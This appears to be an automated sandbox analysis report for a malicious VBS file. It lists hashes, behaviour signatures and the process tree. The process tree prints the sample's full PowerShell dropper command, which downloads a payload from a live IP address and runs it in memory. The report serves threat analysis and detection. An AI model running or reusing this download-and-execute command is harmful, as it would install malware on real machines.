Analysis
-
max time kernel
48s -
max time network
52s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
26/09/2022, 10:39
Static task
static1
Behavioral task
behavioral1
Sample
P084909424.vbs
Resource
win7-20220901-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
P084909424.vbs
Resource
win10v2004-20220812-en
12 signatures
150 seconds
General
-
Target
P084909424.vbs
-
Size
616KB
-
MD5
d49d1ec1abbfd72f724cff7b47ad9d14
-
SHA1
255b5be08a6c41fdd0cc36a3aa0d1e053cfda137
-
SHA256
437b8aeed7846a1bcc5a9ad86d3cf15e7c07945060b69b5d9e34f1d80707c134
-
SHA512
fad9d15bdc9b826b842bf3ec365295a684ff6c32eb58749b748fc5ab408597335dfe5b3cb8f9244b152039a8412c48d489c3c6cfe97592941dd26ca16c7b7f7a
-
SSDEEP
192:hmKZ++C+Hm+5+E+/+S+u+a+2+J+Ca+I+Y+I+L+V+v+74+B+r+Y+c+Zc+w+3e+qKp:gcgeS
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://20.7.14.99/bug/dll_nostartup
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 812 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 812 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1288 wrote to memory of 812 1288 WScript.exe 27 PID 1288 wrote to memory of 812 1288 WScript.exe 27 PID 1288 wrote to memory of 812 1288 WScript.exe 27
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\P084909424.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/bug/dll_nostartup'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.ad/swen/76.881.222.401//:ptth'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812
-